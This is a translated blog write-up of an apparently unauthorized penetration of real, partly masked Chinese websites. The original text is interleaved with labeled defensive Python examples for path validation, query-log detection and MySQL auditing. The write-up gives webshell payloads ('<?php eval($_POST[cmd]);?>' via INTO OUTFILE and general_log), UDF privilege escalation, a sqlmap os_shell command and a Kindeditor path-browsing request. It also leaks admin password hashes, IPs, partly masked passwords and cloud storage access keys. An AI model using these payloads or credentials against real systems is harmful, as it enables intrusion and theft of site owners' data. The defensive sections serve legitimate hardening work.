
A scan and penetration test of a certain website

Published: 2020-08-29 07:26:56  Source: Internet  Views: 16927  Author: simeon2005  Column: Security technology

1.1 A penetration test of a certain website

1.1.1 Logging in to the system with a weak back-end password

1. Log in to the CMS back end

   Because reconnaissance of the target site had already been done earlier, and the test account admin/123456 of a demo system resembling the target had been obtained, I logged in directly at http://c*****.t*****.com/m.php on the target site, as shown in Figure 1, and successfully entered the CMS. The CMS site shows some security awareness: admin.php was renamed to m.php; the admin.php page still exists but is non-functional.

Figure 1: Logging in to the CMS back end

2. Analyze and study each back-end function one by one

   After logging in to the back end, the system settings, file upload, data backup, project management, order management, member management, scheduled tasks, mobile platform and other modules were reviewed to determine whether the system was developed in-house or built on a public template. The analysis showed that the system was developed independently; no source code is public on the Internet, so a source-code audit was not possible.

1.1.2 Initial vulnerability discovery

1. Analysis of the file upload module

(1) All upload modules in the system use the same upload editor, Kindeditor. In actual testing, all known file upload vulnerabilities and the related methods failed.

(2) The file upload module uses the Kindeditor editor. Find a place where images or files are uploaded, as shown in Figure 2, choose "Image from the web", then click Browse; the upload folder on the server hosting the CMS can then be viewed.

Figure 2: Testing the upload module

(3) Kindeditor file browsing vulnerability

The path parameter of Kindeditor's file_manager_json.php is not strictly filtered, and disk files can be browsed by modifying this parameter. Early Kindeditor versions could browse directories without any further parameters; newer versions patched the vulnerability, but it still exists, it merely requires appending a value such as "&order=NAME&1546003143021", which the system generates automatically. The value can be captured with BurpSuite, as shown in Figure 3. Where permissions are not strictly restricted, disk files can be viewed by modifying the value of the path parameter; the original path value contains no "/". After modifying the value in BurpSuite's Repeater and clicking "Go" to submit, the file list and related information appear in the right-hand window.

Figure 3: Testing the directory browsing vulnerability

The same result as the BurpSuite capture-and-submit can of course also be obtained by visiting the following address in a browser:

http://c*****.t*****.com/admin/public/kindeditor/php/file_manager_json.php?path=&order=NAME&1546003143021. The path parameter was modified again through BurpSuite, but because of permissions, as shown in Figure 4, file information in the parent directory could not be obtained.

Figure 4: Parent directory file information could not be obtained

Key point: kindeditor/php/file_manager_json.php?path=&order=NAME&1546003143021
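The root cause of the file-manager issue described above is that the user-supplied path parameter is joined to the upload directory without confining the result to that directory. The following is an added example, not code from the original article or from the Kindeditor project, of how such a listing request should be validated server-side: the path is normalized and must remain inside the upload root, and the order parameter is checked against an allow-list. UPLOAD_ROOT and the sample paths are constructed values.

```python
import posixpath

# Constructed values: the directory the file manager is allowed to expose and the
# sort keys the file manager accepts. Replace UPLOAD_ROOT with the deployment's
# real upload directory.
UPLOAD_ROOT = "/data/wwwroot/example.test/admin/public/upload"
ALLOWED_ORDER = {"NAME", "SIZE", "TYPE"}


def resolve_browse_path(path_param, upload_root=UPLOAD_ROOT):
    """Map a user-supplied 'path' parameter onto a directory inside upload_root.

    Returns the normalized absolute directory, or None when the request would
    escape the upload root (absolute path, '..' segments, NUL bytes, backslashes).
    """
    # Hard rejects before any path arithmetic
    if "\x00" in path_param or "\\" in path_param or path_param.startswith("/"):
        return None

    root = posixpath.normpath(upload_root)
    candidate = posixpath.normpath(posixpath.join(root, path_param))

    # The candidate must be the root itself or a descendant of it. Comparing
    # against root + "/" prevents "/upload" from matching "/upload_old".
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def validate_browse_request(params, upload_root=UPLOAD_ROOT):
    """Validate the query parameters of a file-manager listing request.

    params: dict of query parameters, e.g. {"path": "images/2020", "order": "NAME"}.
    Returns (directory, order) on success, or None if any parameter is unsafe.
    """
    directory = resolve_browse_path(params.get("path", ""), upload_root)
    if directory is None:
        return None
    order = params.get("order", "NAME").upper()
    if order not in ALLOWED_ORDER:
        return None
    return directory, order


if __name__ == "__main__":
    for p in ("", "images/2020", "../../etc", "images/../../..", "/etc/passwd"):
        print(repr(p), "->", resolve_browse_path(p))
```

The check is purely lexical so that it runs anywhere; in a real handler, follow it with os.path.realpath on the resulting directory and repeat the prefix comparison, so that a symlink planted inside the upload directory cannot point the listing outside it. Rejecting the request outright (rather than silently clamping it) also gives the web log a clear signal to alert on.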

2. Database backup and restore

(1) The database can be backed up, but the location and file name of the backup file are unknown.

(2) Database query. The website provides a direct database query interface at http://c****.t*****.com/m.php?m=Database&a=sql& where statements can be entered and run. By running MySQL commands, user names, passwords and other information in the database can be obtained; for example, running select * from mysql.user, as shown in Figure 5, yields the database users and password hashes, and the MySQL password hashes can be cracked directly on sites such as cmd5.com.

Figure 5: Obtaining database user information

3. Testing the other function modules

   Because this was a production system, tests that might crash it or cause problems could not be performed. Running dangerous operations on a production system that has not been backed up can delete the database or other data beyond recovery.

1.1.3 Gathering information on the server

1. Gathering the server's IP address

(1) Ping the domain directly; the IP address obtained was 1**.1**.3*.**4.

(2) Reverse lookup of the domain on https://www.yougetsignal.com/tools/web-sites-on-web-server/ to obtain the IP address.

2. Port scanning the server IP address

   The IP address was scanned with Nmap; the results showed ports 21, 22, 80 and 3306 open.

3. Testing ports 21, 22 and 80

(1) Port 21 is the FTP port; an FTP server is running on this host.

(2) Accessing port 80, that is, accessing the IP address directly, as shown in Figure 6, shows that the Web server was installed with the open-source OneinStack stack; the page displays local environment information, including phpinfo, phpMyAdmin and so on.

Figure 6: Identifying the Web server stack

(3) Crack the MySQL password obtained earlier and log in to phpMyAdmin

Open http://1**.1**.3*.**4/phpMyAdmin/ in the browser and log in with the account and password obtained earlier, root/w*****888, as shown in Figure 7; root privileges on the MySQL database were obtained.

Figure 7: Obtaining database administration privileges

(4) Going through the table information of each database, the real physical paths were obtained as follows:

/data/wwwroot/******ud.****s.cn/admin/public/robot/robot_0029.jpg

******ud.****s.cn/admin/public/robot/robot_0029.jpg

/data/wwwroot/www.s ******.com/admin/public/robot/robot_0026.jpg

/data/wwwroot/******ud.****s.cn/admin/public/robot/robot_0052.jpg

/data/wwwroot/ajg.t*****.com/admin/public/robot/robot_0596.jpg

(5) Obtaining the website address corresponding to each database

By analyzing the tables in the databases, the website URL corresponding to each database was obtained; the ***shop database corresponds to the site a**.t*****.com, with administrator credentials admin/dd****09.

1.1.4 Attempting to obtain a webshell

   Because the MySQL account obtained this time is the root account, past experience suggested a webshell should be easy to obtain, but the server runs Linux, and subsequent testing failed to get one. The methods tried are summarized and analyzed below.

1. Reading CMS system file contents

(1) Testing file reading in a local environment

Testing locally, select load_file('C:/ComsenzEXP/wwwroot/demo/index.php'); as shown in Figure 8, successfully read index.php.

Figure 8: Reading a file on the local server

(2) Testing against the real server.

Because port 3306 is open on the target server, a MySQL client such as Navicat can connect to it; after connecting, run:

select load_file('/data/wwwroot/******ud.****s.cn/index.php');

As shown in Figure 9, the actual result was NULL; the file contents could not be read.

Figure 9: Testing file reading on the real server

2. File write test

(1) First test file export in the local environment:

select '<?php eval($_POST[cmd]);?>' into outfile 'C:/ComsenzEXP/wwwroot/demo/eval.php'; as shown in Figure 10, this executes successfully and produces a one-line backdoor with the password "cmd";

Figure 10: Generating a one-line backdoor

(2) Testing on the real server. Based on the website physical path learned earlier, run:

select '<?php eval($_POST[cmd]);?>' into outfile '/data/wwwroot/a**.t*****.com/admin/public/robot/eval.php'; the write failed because of Linux file permissions.

3. Using sqlmap's direct MySQL connection to obtain a cmd_shell

  The direct MySQL connection command to obtain a cmd_shell ran successfully, but no commands could be executed.

sqlmap.py -d "mysql://sroot:w*****888@1**.1**.3*.**4:3306/mysql" --os_shell

4. The general_log method of obtaining a webshell through MySQL

    The general_log method is used when MySQL forbids writing a webshell through export (the secure-file-priv parameter disables import/export): the query log file is pointed at a file under the web root, and a query is then executed so that its text lands in that file.

(1) Check the general_log variables

show variables like '%general%';

(2) Enable the general_log variable

set global general_log = on;

(3) Set the general_log file to the shell file

set global general_log_file = '/data/wwwroot/www.*****.cn/abouts1.php';

(4) If that succeeds, run the one-line cmd query:

select '<?php eval($_POST[cmd]);?>';

After execution, because of permissions, a webshell could not be obtained directly, as shown in Figure 11.

Figure 11: Obtaining a webshell via the general_log method failed

5. MySQL privilege escalation on Linux

show variables like '%plugin%';

select * from func; 

select unhex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into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';

create function sys_eval returns string soname 'mysqludf.so';

select sys_eval('whoami');

select * from func;

  The method above is equivalent to privilege escalation through sqlmap's direct database connection; since the data could not be imported, privilege escalation was not possible either.
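Every technique tried in 1.1.4 (LOAD_FILE, INTO OUTFILE/DUMPFILE, redirecting general_log_file, CREATE FUNCTION ... SONAME, reading mysql.user) leaves a distinctive statement in the server's query log, which is what a defender should watch for. The following is an added example, not from the original article, of a small detector that parses MySQL general query log lines (the MySQL 5.7 line format: timestamp, thread id, command, argument) and flags these statements. The log lines are constructed samples; the web root and file names in them are placeholders, not values from the case.

```python
import re

# One MySQL general query log line: "<timestamp>\t<thread_id> <command>\t<argument>"
LOG_LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>[A-Za-z_]+)\s+(?P<arg>.*)$")

# Detection rules: (rule name, pattern applied to the SQL text of Query commands)
RULES = [
    ("file_read_load_file", re.compile(r"\bload_file\s*\(", re.I)),
    ("file_write_outfile", re.compile(r"\binto\s+(outfile|dumpfile)\b", re.I)),
    ("general_log_redirect", re.compile(r"\bset\s+(global\s+)?general_log(_file)?\b", re.I)),
    ("udf_create_function", re.compile(r"\bcreate\s+function\b.*\bsoname\b", re.I)),
    ("credential_table_read", re.compile(r"\bfrom\s+mysql\.user\b", re.I)),
    ("plugin_dir_probe", re.compile(r"\bshow\s+variables\b.*plugin", re.I)),
]

# A write whose target is a web root or a .php file is the worst case; the path
# prefix is an assumption matching the OneinStack layout seen in the article.
WEBROOT_HINT = re.compile(r"'(/data/wwwroot/[^']*|[^']*\.php)'", re.I)


def scan_general_log(lines):
    """Return a list of findings, one per matching Query line, in log order."""
    findings = []
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if not m or m.group("cmd").lower() != "query":
            continue
        sql = m.group("arg")
        for name, pattern in RULES:
            if not pattern.search(sql):
                continue
            severity = "medium" if name == "plugin_dir_probe" else "high"
            if name == "file_write_outfile" and WEBROOT_HINT.search(sql):
                severity = "critical"
            findings.append(
                {"thread": int(m.group("tid")), "rule": name, "severity": severity, "sql": sql}
            )
    return findings


def summarize(findings):
    """Count findings per rule, useful for a dashboard or a daily report."""
    counts = {}
    for f in findings:
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


# Constructed sample log: one benign application query followed by the statement
# types from the article, issued from two connection threads.
SAMPLE_LOG = """\
2020-08-29T07:26:56.000000Z\t   12 Connect\tcms@203.0.113.10 on cms
2020-08-29T07:26:57.000000Z\t   12 Query\tselect id, name from products where id = 3
2020-08-29T07:27:01.000000Z\t   12 Query\tselect load_file('/data/wwwroot/example.test/index.php')
2020-08-29T07:27:05.000000Z\t   12 Query\tselect 'test' into outfile '/data/wwwroot/example.test/admin/public/robot/x.php'
2020-08-29T07:27:09.000000Z\t   12 Query\tset global general_log_file = '/data/wwwroot/example.test/abouts1.php'
2020-08-29T07:27:12.000000Z\t   12 Query\tcreate function sys_eval returns string soname 'mysqludf.so'
2020-08-29T07:27:15.000000Z\t   13 Query\tselect host,user,password from mysql.user
"""

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG.splitlines()):
        print("[%s] thread %d %s: %s" % (f["severity"], f["thread"], f["rule"], f["sql"]))
    print(summarize(scan_general_log(SAMPLE_LOG.splitlines())))
```

Because the general log itself is one of the things an attacker changes, feed the detector from a source the application account cannot reconfigure, such as the MySQL Enterprise Audit or MariaDB audit plugin output, or from the server's binary log for the DDL statements. Correlating on the thread id, as the findings do, lets you tie a file write back to the connection and source address that issued it.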

1.1.5 *** against another target of the same kind

1. Subdomain enumeration

   Using subDomainsBrute (https://github.com/lijiejie/subDomainsBrute) in Kali to search for subdomains of the target *****.cn:

./subDomainsBrute.py *****.cn

After testing, job.*****.cn, image.*****.cn and api.*****.cn were found; no other subdomains were discovered.

2. Main site ***

(1) Obtaining the real physical path from an error message

/data/wwwroot/www.*****.cn/ThinkPHP/Library/Think/Dispatcher.class.php

(2) Weak back-end password on www.*****.cn

    The main site CMS has the weak password admin/admin; the system is built on the ThinkPHP framework, version 3.2.3. Although the back end was entered, a webshell could not be obtained.

3. Target site ***

Logged in to the target site's back-end administration through ******ud.****s.cn/m.php; after entering the back end with a weak agent-account password, the database password was obtained through a broken access control vulnerability.

(1) Administrator accounts and passwords

admin 203972cad03302b4e83985004b159e66 61.156.121.192  w*****12

cadmin 2b2df28f20de4189ea1c4493f3e5e5bf  39.83.43.146  q*****14

(2) Database users and passwords

http://******ud.****s.cn/m.php?m=Database&a=sql&

select host,user,password from mysql.user; as shown in Figure 12, the server's database password was successfully obtained.

Figure 12: Obtaining the database password

(3) Connecting to the database with a client tool

   Connecting to the database directly with a client tool, as shown in Figure 13, allows the database to be managed.

Figure 13: Connecting to the MySQL database for administration

1.1.6 OSS server ***

1. OSS management client download addresses

(1) 32-bit: http://gosspublic.alicdn.com/oss-browser/1.7.4/oss-browser-win32-ia32.zip?spm=a2c4g.11186623.2.8.5c735352ekAZYC&file=oss-browser-win32-ia32.zip

(2) 64-bit: http://gosspublic.alicdn.com/oss-browser/1.7.4/oss-browser-win32-x64.zip?spm=a2c4g.11186623.2.9.5c735352cSK0r0&file=oss-browser-win32-x64.zip

(3) Mac: http://gosspublic.alicdn.com/oss-browser/1.7.4/oss-browser-darwin-x64.zip?spm=a2c4g.11186623.2.10.5c735352ekAZYC&file=oss-browser-darwin-x64.zip

(4) Linux 64-bit: http://gosspublic.alicdn.com/oss-browser/1.7.4/oss-browser-linux-x64.zip?spm=a2c4g.11186623.2.11.5c735352ekAZYC&file=oss-browser-linux-x64.zip

2. KeyID and KeySecret information obtained from the database

Configuration details for two OSS accounts were found in the database:

(1) OSS account 1 details

{"keyId":"LTAI*****9O3cMjZ","keySecret":"INBUN3sOb*****9Nq2m5K4FtNEd","endpoint":"oss-cn-beijing.aliyuncs.com","bucket":"v*****9","id":"1"}

(2) OSS account 2 details

{"keyId":"LTA*****929oTEL","keySecret":"RA5hx*****9qkrf9UUmI63ZNDuu","id":"6"}

3. Connecting with the OSS client and viewing files

(1) Log in to the OSS client. Download the OSS client for the corresponding operating system from the links above (the official Alibaba Cloud version used here is 1.7.4; the latest is 1.8.1), run the oss-browser program, and enter the AccessKeyId and AccessKeySecret to log in, as shown in Figure 14.

Figure 14: Logging in with the OSS client

(2) Viewing the files stored in OSS

   As shown in Figure 15, after logging in to the OSS file storage server, it turns out that this server mainly stores image files; all images and related files of the target server's CMS are uploaded to the OSS server. Selecting a folder allows it to be downloaded locally.

Figure 15: Image storage information

1.1.7 Defense and summary

1. Multiple techniques used in combination; the technical difficulty is not high

(1) Weak-password testing in this case

(2) Reading files through the MySQL server

(3) Exporting files from the MySQL database

(4) Testing several methods of obtaining a webshell through MySQL

(5) OSS accounts, and logging in to the OSS server to view files

(6) Exploiting the Kindeditor file editor vulnerability

2. By analyzing the database on the server, an early version of this CMS was obtained; analysis of its files showed that database backup files can be downloaded once a backup has been made.

(1) When the database is backed up, a record is automatically generated; that record is the name of the backup folder. For example, if the folder name is 1545946653, the full download addresses are:

http://localhost//demo/public/db_backup/1545946653/1545946653_1.sql

http://localhost//demo/public/db_backup/1545946653/1545946653_9.sql

(2) Even without root privileges, the database files can be obtained: back up the data and then download it, as shown in Figure 16, following the naming rule.

Figure 16: Downloading the database files

3. Defensive measures

(1) In this case, the Linux server already had strict permission settings

(2) The MySQL account used by the application should not have root privileges; use one database user per database, with least privilege.

(3) Do not leave a public SQL query interface in the CMS; such an interface becomes the breach point.

(4) Combine back-end login with phone verification codes, so that even a weak password cannot be used to log in.
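The defensive point in (2) above, least privilege for the database account, together with the server settings that decided the outcome of 1.1.4 (secure-file-priv, the general log, and 3306 reachable from the Internet), can be checked mechanically. The following is an added example, not from the original article, of a small audit function that takes SHOW VARIABLES values and SHOW GRANTS lines and reports the risky settings; the "weak" and "hardened" inputs are constructed samples resembling the case, not values copied from the target.

```python
import re

# Parses one line of SHOW GRANTS output, e.g.
#   GRANT SELECT, INSERT ON cms.* TO 'cms'@'localhost'
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+'(?P<user>[^']*)'@'(?P<host>[^']*)'",
    re.IGNORECASE,
)
# Privileges that turn a SQL injection or a leaked password into file access
# (FILE) or server reconfiguration (SUPER): never needed by a web application.
DANGEROUS_PRIVS = {"ALL PRIVILEGES", "ALL", "FILE", "SUPER"}


def audit_mysql(variables, grants):
    """Return a list of findings (strings) for a MySQL server.

    variables: dict built from SHOW VARIABLES output (name -> value, as strings).
    grants:    list of SHOW GRANTS lines for the accounts to review.
    """
    findings = []

    # secure_file_priv="" lets LOAD_FILE and INTO OUTFILE/DUMPFILE touch any path
    # the mysqld user can reach; NULL disables them, a directory confines them.
    if variables.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv is empty: set it to NULL or a dedicated directory")
    if variables.get("local_infile", "OFF").upper() == "ON":
        findings.append("local_infile is ON: disable unless LOAD DATA LOCAL is required")
    if variables.get("general_log", "OFF").upper() == "ON":
        findings.append("general_log is ON: its file location is attacker-controllable; prefer an audit plugin")
    if variables.get("bind_address", "*") in ("*", "0.0.0.0", "::"):
        findings.append("bind_address exposes 3306 on all interfaces: bind to localhost or a private address")

    for grant in grants:
        m = GRANT_RE.match(grant.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        issues = []
        if privs & DANGEROUS_PRIVS:
            issues.append("holds " + ", ".join(sorted(privs & DANGEROUS_PRIVS)))
        if m.group("scope") == "*.*":
            issues.append("scope is *.* instead of a single database")
        if m.group("host") == "%":
            issues.append("allowed from any host (%)")
        if issues:
            findings.append("account '%s'@'%s': %s" % (m.group("user"), m.group("host"), "; ".join(issues)))
    return findings


# Constructed sample: a configuration like the one met in the case (root reachable
# on 3306, file functions unrestricted) beside a least-privilege configuration.
WEAK_VARIABLES = {"secure_file_priv": "", "local_infile": "ON", "general_log": "ON", "bind_address": "0.0.0.0"}
WEAK_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION",
    "GRANT ALL PRIVILEGES ON *.* TO 'cms'@'%'",
]
HARDENED_VARIABLES = {"secure_file_priv": "NULL", "local_infile": "OFF", "general_log": "OFF", "bind_address": "127.0.0.1"}
HARDENED_GRANTS = ["GRANT SELECT, INSERT, UPDATE, DELETE ON cms.* TO 'cms'@'localhost'"]

if __name__ == "__main__":
    for label, v, g in (("weak", WEAK_VARIABLES, WEAK_GRANTS), ("hardened", HARDENED_VARIABLES, HARDENED_GRANTS)):
        print(label, "->", audit_mysql(v, g) or ["no findings"])
```

With the hardened settings, every step of 1.1.4 is closed at the server rather than left to file-system permissions: secure_file_priv=NULL refuses LOAD_FILE and INTO OUTFILE regardless of where the web root is, the application account cannot issue SET GLOBAL or CREATE FUNCTION without SUPER, and a password recovered from mysql.user is useless from outside the host once 3306 is no longer bound publicly.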

If you found this article useful, see more of the author's columns: Web Website Security Assessment, Analysis and Defense, and "Network Security from Beginner to Practice: Let SQLmap Fly for a While".
